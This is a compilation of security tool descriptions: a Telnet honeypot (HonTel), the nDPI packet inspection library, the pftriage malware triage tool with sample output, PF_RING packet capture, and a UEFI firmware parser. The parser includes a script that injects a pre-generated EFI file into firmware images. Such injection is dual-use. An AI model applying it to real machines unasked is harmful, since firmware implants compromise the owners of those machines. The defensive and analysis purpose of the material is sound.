    HonTel is a honeypot for the Telnet service. Basically, it is a Python 2.x application emulating the service inside a chroot environment. It was originally designed to run inside an Ubuntu environment, though it could easily be adapted to run inside any Linux environment.

    Documentation:
    Setting up the environment and running the application requires intermediate Linux administration knowledge. The whole deployment process can be found step-by-step inside the deploy.txt file. Configuration settings can be found and modified inside hontel.py itself. For example, authentication credentials can be changed from the default root:123456 to arbitrary values (options AUTH_USERNAME and AUTH_PASSWORD), as can the Welcome message (option WELCOME), the hostname (option FAKE_HOSTNAME), the architecture (option FAKE_ARCHITECTURE), the location of the log file containing all telnet commands (inside the chroot environment) (option LOG_PATH), the location of binary files dropped by connected users (option SAMPLES_DIR), etc.
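A minimal sketch of the credential check those options drive (hypothetical code, not taken from hontel.py; only the option names and the root:123456 default come from the text above):

```python
# Defaults mirror the documented root:123456 credentials (AUTH_USERNAME / AUTH_PASSWORD).
AUTH_USERNAME = "root"
AUTH_PASSWORD = "123456"

def check_login(username, password, attempts_log):
    """Record every attempt (a honeypot logs everything), accept only the configured pair."""
    attempts_log.append((username, password))
    return username == AUTH_USERNAME and password == AUTH_PASSWORD

log = []
ok = check_login("root", "123456", log)
bad = check_login("admin", "admin", log)
```

In the real honeypot the logged attempts, and any commands issued after login, are what make the captured data valuable.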

    Note: Some botnets tend to delete files from compromised hosts (e.g. /bin/bash) in order to harden the host against potential cleaning attempts and/or installation attempts by other (concurrent) botnets. In such cases either the whole chroot environment has to be reinstalled, or the host directory where the chroot directory resides (e.g. /srv/chroot/) should be recovered from a previously stored backup (recommended).


    nDPI - Open Source Deep Packet Inspection Software Toolkit


    nDPI is a ntop-maintained superset of the popular OpenDPI library. Released under the LGPL license, its goal is to extend the original library by adding new protocols that are otherwise available only in the paid version of OpenDPI. In addition to Unix platforms, we also support Windows, in order to provide a cross-platform DPI experience. Furthermore, we have modified nDPI to be more suitable for traffic-monitoring applications by disabling specific features that slow down the DPI engine and are unnecessary for network traffic monitoring.
    nDPI is used by both ntop and nProbe for adding application-layer detection of protocols, regardless of the port being used. This means that it is possible to both detect known protocols on non-standard ports (e.g. detect http on ports other than 80), and also the opposite (e.g. detect Skype traffic on port 80). This is because nowadays the concept of port=application no longer holds.
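The port-independent idea can be illustrated with a toy payload classifier (a drastic simplification; nDPI's real dissectors inspect far more state than a flow's first bytes):

```python
def classify(payload: bytes) -> str:
    """Guess the protocol from the first bytes of a flow, ignoring the port entirely."""
    if payload.startswith((b"GET ", b"POST ", b"HEAD ", b"HTTP/")):
        return "HTTP"
    if payload.startswith(b"SSH-"):
        return "SSH"
    if payload[:2] == b"\x16\x03":  # TLS handshake record: content type 0x16, version 3.x
        return "SSL/TLS"
    return "unknown"

# HTTP is detected even if the flow ran on port 8080; TLS even on port 80.
proto = classify(b"GET /index.html HTTP/1.1\r\n")
```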

    Many protocols are supported including:

    • FTP
    • POP
    • SMTP
    • IMAP
    • DNS
    • IPP
    • HTTP
    • MDNS
    • NTP
    • NETBIOS
    • NFS
    • SSDP
    • BGP
    • SNMP
    • XDMCP
    • SMB
    • SYSLOG
    • DHCP
    • PostgreSQL
    • MySQL
    • TDS
    • DirectDownloadLink
    • I23V5
    • AppleJuice
    • DirectConnect
    • Socrates
    • WinMX
    • VMware
    • PANDO
    • Filetopia
    • iMESH
    • Kontiki
    • OpenFT
    • Kazaa/Fasttrack
    • Gnutella
    • eDonkey
    • Bittorrent
    • OFF
    • AVI
    • Flash
    • OGG
    • MPEG
    • QuickTime
    • RealMedia
    • Windowsmedia
    • MMS
    • XBOX
    • QQ
    • MOVE
    • RTSP
    • Feidian
    • Icecast
    • PPLive
    • PPStream
    • Zattoo
    • SHOUTCast
    • SopCast
    • TVAnts
    • TVUplayer
    • VeohTV
    • QQLive
    • Thunder/Webthunder
    • Soulseek
    • GaduGadu
    • IRC
    • Popo
    • Jabber
    • MSN
    • Oscar
    • Yahoo
    • Battlefield
    • Quake
    • VRRP
    • Steam
    • Halflife2
    • World of Warcraft
    • Telnet
    • STUN
    • IPSEC
    • GRE
    • ICMP
    • IGMP
    • EGP
    • SCTP
    • OSPF
    • IP in IP
    • RTP
    • RDP
    • VNC
    • PCAnywhere
    • SSL
    • SSH
    • USENET
    • MGCP
    • IAX
    • TFTP
    • AFP
    • StealthNet
    • Aimini
    • SIP
    • Truphone
    • ICMPv6
    • DHCPv6
    • Armagetron
    • CrossFire
    • Dofus
    • Fiesta
    • Florensia
    • Guildwars
    • HTTP Application Activesync
    • Kerberos
    • LDAP
    • MapleStory
    • msSQL
    • PPTP
    • WARCRAFT3
    • World of Kung Fu
    • MEEBO
    • FaceBook
    • Twitter
    • DropBox
    • Gmail
    • Google Maps
    • YouTube
    • Skype
    • Google
    • DCE RPC
    • NetFlow_IPFIX
    • sFlow
    • HTTP Connect (SSL over HTTP)
    • HTTP Proxy
    • Netflix
    • Citrix
    • CitrixOnline/GotoMeeting
    • Apple (iMessage, FaceTime…)
    • Webex
    • WhatsApp
    • Apple iCloud
    • Viber
    • Apple iTunes
    • Radius
    • WindowsUpdate
    • TeamViewer
    • Tuenti
    • LotusNotes
    • SAP
    • GTP
    • UPnP
    • LLMNR
    • RemoteScan
    • Spotify
    • H323
    • OpenVPN
    • NOE
    • CiscoVPN
    • TeamSpeak
    • Tor
    • CiscoSkinny
    • RTCP
    • RSYNC
    • Oracle
    • Corba
    • UbuntuONE
    • CNN
    • Wikipedia
    • Whois-DAS
    • Collectd
    • Redis
    • ZeroMQ
    • Megaco
    • QUIC
    • WhatsApp Voice
    • Starcraft
    • Teredo
    • Snapchat
    • Simet
    • OpenSignal
    • 99Taxi
    • GloboTV
    • Deezer
    • Instagram
    • Microsoft cloud services
    • Twitch
    • KakaoTalk Voice and Chat
    • HotspotShield VPN


      Pftriage - Python Tool And Library To Help Analyze Files During Malware Triage And Analysis


      pftriage is a tool to help analyze files during malware triage. It allows an analyst to quickly view and extract properties of a file to help during the triage process. The tool also has an analyze function which can detect common malicious indicators used by malware.

      Dependencies
      • pefile
      • filemagic
      Note: On Mac, Apple has implemented its own version of the file command. However, libmagic can be installed using Homebrew:
      $ brew install libmagic

      Usage
      usage: pftriage [options]

      Show information about a file for triage.

      positional arguments:
      file The file to triage.

      optional arguments:
      -h, --help show this help message and exit
      -i, --imports Display import tree
      -s, --sections Display overview of sections. For more detailed info
      pass the -v switch
      --removeoverlay Remove overlay data.
      --extractoverlay Extract overlay data.
      -r, --resources Display resource informations
      -D DUMP_OFFSET, --dump DUMP_OFFSET
      Dump data using the passed offset or 'ALL'. Currently
      only works with resources.
      -a, --analyze Analyze the file.
      -v, --verbose Display version.
      -V, --version Print version and exit.

      Sections
      Display Section information by using the -s or --sections switch. Additionally you can pass (-v) for a more verbose view of section details.
      To export a section pass --dump and the desired section Virtual Address. (ex: --dump 0x00001000)
       ---- Section Overview (use -v for detailed section info)  ----

      Name Raw Size Raw Data Pointer Virtual Address Virtual Size Entropy Hash
      .text 0x00012200 0x00000400 0x00001000 0x000121d8 6.71168555177 ff38fce4f48772f82fc77b4ef223fd74
      .rdata 0x00005a00 0x00012600 0x00014000 0x0000591a 4.81719489022 b0c15ee9bf8480a07012c2cf277c3083
      .data 0x00001a00 0x00018000 0x0001a000 0x0000ab80 5.28838495072 5d969a878a5106ba526aa29967ef877f
      .rsrc 0x00002200 0x00019a00 0x00025000 0x00002144 7.91994689603 d361caffeadb934c9f6b13b2474c6f0f
      .overlay 0x00009b30 0x0001bc00 0x00000000 0x00000000 0 N/A
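The Entropy column above is Shannon entropy over the section's raw bytes; a compact way to compute it (a sketch of the standard formula, not pftriage's code):

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~0 for constant data, approaching 8.0 for random or packed data."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

low = shannon_entropy(b"\x00" * 1024)      # constant data -> 0.0
high = shannon_entropy(bytes(range(256)))  # uniform data  -> 8.0
```

High-entropy sections like .rsrc (7.92) in the table above are a common hint of packed or encrypted content.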

      Resources
      Display resource data by using -r or --resources.
       ---- Resource Overview ----

      Type: CODATA
      Name Language SubLang Offset Size Code Page Type
      0x68 LANG_RUSSIAN RUSSIAN 0x000250e0 0x00000cee 0x000004e4
      0x69 LANG_RUSSIAN RUSSIAN 0x00025dd0 0x000011e6 0x000004e4

      Type: RT_MANIFEST
      Name Language SubLang Offset Size Code Page Type
      0x1 LANG_ENGLISH ENGLISH_US 0x00026fb8 0x0000018b 0x000004e4
      To extract a specific resource use -D with the desired offset. If you want to extract all resources, pass ALL instead of a specific offset.

      Imports
      Display import data and modules using -i or --imports. Imports resolved by ordinal are flagged and include the ordinal used.
      [*] Loading File...
      ---- Imports ----
      Number of imported modules: 4

      KERNEL32.dll
      |-- GetProcessHeap
      |-- HeapFree
      |-- HeapAlloc
      |-- SetLastError
      |-- GetLastError

      WS2_32.dll
      |-- getaddrinfo
      |-- freeaddrinfo
      |-- closesocket Ordinal[3] (Imported by Ordinal)
      |-- WSAStartup Ordinal[115] (Imported by Ordinal)
      |-- socket Ordinal[23] (Imported by Ordinal)
      |-- send Ordinal[19] (Imported by Ordinal)
      |-- recv Ordinal[16] (Imported by Ordinal)
      |-- connect Ordinal[4] (Imported by Ordinal)

      ole32.dll
      |-- CoCreateInstance
      |-- ...

      Exports
      Display exports using -e or --exports.
      [*] Loading File...

      ---- Exports ----
      Total Exports: 5
      Address Ordinal Name
      0x00001151 1 FindResources
      0x00001103 2 LoadBITMAP
      0x00001137 3 LoadICON
      0x000010e9 4 LoadIMAGE
      0x0000111d 5 LoadSTRINGW

      Metadata
      File and version metadata is displayed if no options are passed on the command line.
      [*] Loading File...
      [*] Processing File details...


      ---- File Summary ----

      General
      Filename samaple.exe
      Magic Type PE32 executable (GUI) Intel 80386, for MS Windows
      Size 135168
      First Bytes 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00

      Hashes
      MD5 8e8a8fe8361c7238f60d6bbfdbd304a8
      SHA1 557832efe10daff3f528a3c3589eb5a6dfd12447
      SHA256 118983ba4e1c12a366d7d6e9461c68bf222e2b03f3c1296091dee92ac0cc9dd8
      Import Hash 0239fd611af3d0e9b0c46c5837c80e09
      ssdeep

      Headers
      Subsystem IMAGE_SUBSYSTEM_WINDOWS_GUI
      Linker Version 12.0 - (Visual Studio 2013)
      Image Base 0x400000
      Compile Time Thu Jun 23 16:04:21 2016 UTC
      Checksum 0
      Filename sample.exe
      EP Bytes 55 8b ec 51 83 65 fc 00 8d 45 fc 56 57 50 e8 64
      Signature 0x4550
      First Bytes 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00
      Sections 4
      Entry Point 0x139de
      Packed False
      Size 135168
      Characteristics
      IMAGE_FILE_32BIT_MACHINE
      IMAGE_FILE_EXECUTABLE_IMAGE
      IMAGE_FILE_RELOCS_STRIPPED

      Analyze
      pftriage can perform a simple analysis of a file to identify malicious characteristics.
      [*] Loading File...
      [*] Analyzing File...
      [*] Analysis Complete...

      [!] Checksum Invalid CheckSum
      [!] AntiDebug AntiDebug Function import [GetTickCount]
      [!] AntiDebug AntiDebug Function import [QueryPerformanceCounter]
      [!] Imports Suspicious API Call [TerminateProcess]
      [!] AntiDebug AntiDebug Function import [SetUnhandledExceptionFilter]
      [!] AntiDebug AntiDebug Function import [IsDebuggerPresent]
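A hedged sketch of the kind of check behind those AntiDebug flags (the indicator names come from the output above; the matching logic is an assumption, not pftriage's source):

```python
# Imports commonly abused for debugger detection and timing checks.
ANTIDEBUG_APIS = {
    "IsDebuggerPresent",
    "GetTickCount",
    "QueryPerformanceCounter",
    "SetUnhandledExceptionFilter",
}

def flag_antidebug(imported_names):
    """Return the sorted subset of imports that match the anti-debug indicator list."""
    return sorted(set(imported_names) & ANTIDEBUG_APIS)

hits = flag_antidebug(["CreateFileW", "IsDebuggerPresent", "GetTickCount"])
```

Such matches are hints, not proof: legitimate software imports these APIs too, which is why the triage output still needs analyst review.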

      Overlay Data
      Overlay data is identified when analyzing or displaying section information for a file. If overlay data exists, pftriage can either remove it using the (--removeoverlay) switch or export it using the (--extractoverlay) switch.
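Overlay data is simply whatever bytes sit past the end of the last section's raw data, so detecting it reduces to comparing the file size with the furthest raw extent (a sketch under that definition; the hex values below are loosely modeled on the section table shown earlier):

```python
def overlay_offset(file_size, sections):
    """sections: iterable of (raw_pointer, raw_size) pairs.
    Return (offset, length) of the overlay, or None if there is none."""
    end = max((ptr + size for ptr, size in sections), default=0)
    if file_size > end:
        return end, file_size - end
    return None

result = overlay_offset(
    0x25730,
    [(0x400, 0x12200), (0x12600, 0x5A00), (0x18000, 0x1A00), (0x19A00, 0x2200)],
)
```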


      PF_RING - High-Speed Packet Capture, Filtering And Analysis


      PF_RING™ is a new type of network socket that dramatically improves packet capture speed, and is characterized by the following properties:
      1. Available for Linux kernels 2.6.32 and newer.
      2. No need to patch the kernel: just load the kernel module.
      3. 10 Gbit hardware packet filtering using commodity network adapters.
      4. User-space ZC (new generation DNA, Direct NIC Access) drivers for extreme packet capture/transmission speed, as the NIC NPU (Network Process Unit) pushes/pulls packets to/from userland without any kernel intervention. Using the 10 Gbit ZC driver you can send/receive at wire speed at any packet size.
      5. PF_RING ZC library for distributing packets in zero-copy across threads, applications and virtual machines.
      6. Device driver independent.
      7. Support of Accolade, Exablaze, Endace, Fiberblaze, Inveatech, Mellanox, Myricom/CSPI, Napatech, Netcope and Intel (ZC) network adapters.
      8. Kernel-based packet capture and sampling.
      9. Libpcap support (see below) for seamless integration with existing pcap-based applications.
      10. Ability to specify hundreds of header filters in addition to BPF.
      11. Content inspection, so that only packets matching the payload filter are passed.
      12. PF_RING™ plugins for advanced packet parsing and content filtering.

      If you want to know about PF_RING™ internals or for the User’s Manual visit the Documentation section.



      UEFI Firmware Parser - Parse BIOS/Intel ME/UEFI Firmware Related Structures: Volumes, FileSystems, Files, Etc


      The UEFI firmware parser is a simple module and set of scripts for parsing, extracting, and recreating UEFI firmware volumes. This includes parsing modules for BIOS, OptionROM, Intel ME and other formats too. Please use the example scripts for parsing tutorials.


      Installation
      This module is available on PyPI as uefi_firmware
      $ sudo pip install uefi_firmware
      To install from Github, checkout this repo and use:
      $ sudo python ./setup.py install
      Requirements
      • Python development headers, usually found in the python-dev package.
      • The compression/decompression features will use the python headers and gcc.
      • pefile is optional, and may be used for additional parsing.

      Usage
      The simplest way to use the module to detect or parse firmware is through the AutoParser class.
      import uefi_firmware

      # Firmware images are binary; open the file in 'rb' mode.
      with open('/path/to/firmware.rom', 'rb') as fh:
          file_content = fh.read()

      parser = uefi_firmware.AutoParser(file_content)
      if parser.type() != 'unknown':
          firmware = parser.parse()
          firmware.showinfo()
      There are several classes within the uefi, pfs, me, and flash packages that accept file contents in their constructor. In all cases the following abstract methods are implemented:
      • process() performs the parsing work and returns True or False
      • showinfo() prints a hierarchy of information about the structure
      • dump() walks the hierarchy and writes each object to a file

      Scripts
      A Python script, uefi-firmware-parser, is installed:
      $ uefi-firmware-parser -h
      usage: uefi-firmware-parser [-h] [-b] [--superbrute] [-q] [-o OUTPUT] [-O]
      [-c] [-e] [-g GENERATE] [--test]
      file [file ...]

      Parse, and optionally output, details and data on UEFI-related firmware.

      positional arguments:
      file The file(s) to work on

      optional arguments:
      -h, --help show this help message and exit
      -b, --brute The input is a blob and may contain FV headers.
      --superbrute The input is a blob and may contain any sort of
      firmware object
      -q, --quiet Do not show info.
      -o OUTPUT, --output OUTPUT
      Dump firmware objects to this folder.
      -O, --outputfolder Dump firmware objects to a folder based on filename
      ${FILENAME}_output/
      -c, --echo Echo the filename before parsing or extracting.
      -e, --extract Extract all files/sections/volumes.
      -g GENERATE, --generate GENERATE
      Generate a FDF, implies extraction (volumes only)
      --test Test file parsing, output name/success.
      To test a file or directory of files:
      $ uefi-firmware-parser --test ~/firmware/*
      ~/firmware/970E32_1.40: UEFIFirmwareVolume
      ~/firmware/CO5975P.BIO: EFICapsule
      ~/firmware/me-03.obj: IntelME
      ~/firmware/O990-A03.exe: None
      ~/firmware/O990-A03.exe.hdr: DellPFS
      If you need to parse and extract a large number of firmware files, check out the -O option to auto-generate an output folder per file. If parsing and searching for internals in a shell, the --echo option will print the input filename before parsing.
      The firmware-type checker will decide how best to parse the file. If the --test option fails to identify the type, or calls it unknown, try the -b or --superbrute option. The latter performs a byte-by-byte type check.
      $ uefi-firmware-parser --test ~/firmware/970E32_1.40
      ~/firmware/970E32_1.40: unknown
      $ uefi-firmware-parser --superbrute ~/firmware/970E32_1.40
      [...]
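The byte-by-byte search can be sketched as a scan for the EFI firmware volume signature _FVH, which sits at offset 40 of a volume header (an illustration of the idea, not the module's actual logic; a real scanner would validate the rest of the header too):

```python
FVH_SIG = b"_FVH"
SIG_OFFSET = 40  # the signature lives 40 bytes into EFI_FIRMWARE_VOLUME_HEADER

def find_volume_candidates(blob: bytes):
    """Return candidate volume start offsets for every _FVH signature found in the blob."""
    candidates = []
    pos = blob.find(FVH_SIG)
    while pos != -1:
        if pos >= SIG_OFFSET:
            candidates.append(pos - SIG_OFFSET)
        pos = blob.find(FVH_SIG, pos + 1)
    return candidates

# Synthetic blob: 100 bytes of junk, then a fake header with the signature at offset 40.
blob = b"\xff" * 100 + b"\x00" * 40 + b"_FVH" + b"\x00" * 20
offs = find_volume_candidates(blob)
```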
      Features
      • UEFI Firmware Volumes, Capsules, FileSystems, Files, Sections parsing
      • Intel PCH Flash Descriptors
      • Intel ME modules parsing (ME, TXE, etc)
      • Dell PFS (HDR) updates parsing
      • Tiano/EFI, and native LZMA (7z) [de]compression
      • Complete UEFI Firmware volume object hierarchy display
      • Firmware descriptor [re]generation using the parsed input volumes
      • Firmware File Section injection
      GUID Injection
      Injection or GUID replacement (no addition/subtraction yet) can be performed on sections within a UEFI firmware file, or on UEFI firmware files within a firmware filesystem.
      $ python ./scripts/fv_injector.py -h
      usage: fv_injector.py [-h] [-c] [-p] [-f] [--guid GUID] --injection INJECTION
      [-o OUTPUT]
      file

      Search a file for UEFI firmware volumes, parse and output.

      positional arguments:
      file The file to work on

      optional arguments:
      -h, --help show this help message and exit
      -c, --capsule The input file is a firmware capsule.
      -p, --pfs The input file is a Dell PFS.
      -f, --ff Inject payload into firmware file.
      --guid GUID GUID to replace (inject).
      --injection INJECTION
      Pre-generated EFI file to inject.
      -o OUTPUT, --output OUTPUT
      Name of the output file.
      Note: when injecting into a firmware file, the user will be prompted for which section to replace. At the moment this is not yet scriptable.
      IDA Python support
      There is an included script to generate additional GUID labels for import into IDA Python using Snare's plugins. Using -g LABEL, the script will generate Python dictionary-formatted output. This project will try to keep up to date with popular vendor GUIDs automatically.
      $ python ./scripts/uefi_guids.py -h
      usage: uefi_guids.py [-h] [-c] [-b] [-d] [-g GENERATE] [-u] file

      Output GUIDs for files, optionally write GUID structure file.

      positional arguments:
      file The file to work on

      optional arguments:
      -h, --help show this help message and exit
      -c, --capsule The input file is a firmware capsule, do not search.
      -b, --brute The input file is a blob, search for firmware volume
      headers.
      -d, --flash The input file is a flash descriptor.
      -g GENERATE, --generate GENERATE
      Generate a behemoth-style GUID output.
      -u, --unknowns When generating also print unknowns.
      Supported Vendors
      This module has been tested on BIOS/UEFI/firmware updates from the following vendors. Not every update for every product will parse; some may require a priori decompression or extraction from the distribution update mechanism (typically a PE).
      • ASRock
      • Dell
      • Gigabyte
      • Intel
      • Lenovo
      • HP
      • MSI
      • VMware
      • Apple

